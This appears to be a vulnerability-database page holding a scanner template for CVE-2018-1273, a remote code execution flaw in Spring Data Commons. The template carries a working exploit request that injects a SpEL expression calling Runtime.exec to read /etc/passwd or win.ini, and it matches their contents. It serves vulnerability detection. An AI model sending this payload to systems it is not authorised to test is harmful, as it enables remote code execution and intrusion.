9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
id: CVE-2018-1273
info:
name: Spring Data Commons - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
and older unsupported versions, contain a property binder vulnerability
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-1273
- https://pivotal.io/security/cve-2018-1273
- http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://github.com/2lambda123/SBSCAN
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1273
cwe-id: CWE-20,CWE-94
epss-score: 0.97515
epss-percentile: 0.99982
cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: pivotal_software
product: spring_data_commons
tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software
http:
- raw:
- |
POST /account HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.3 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%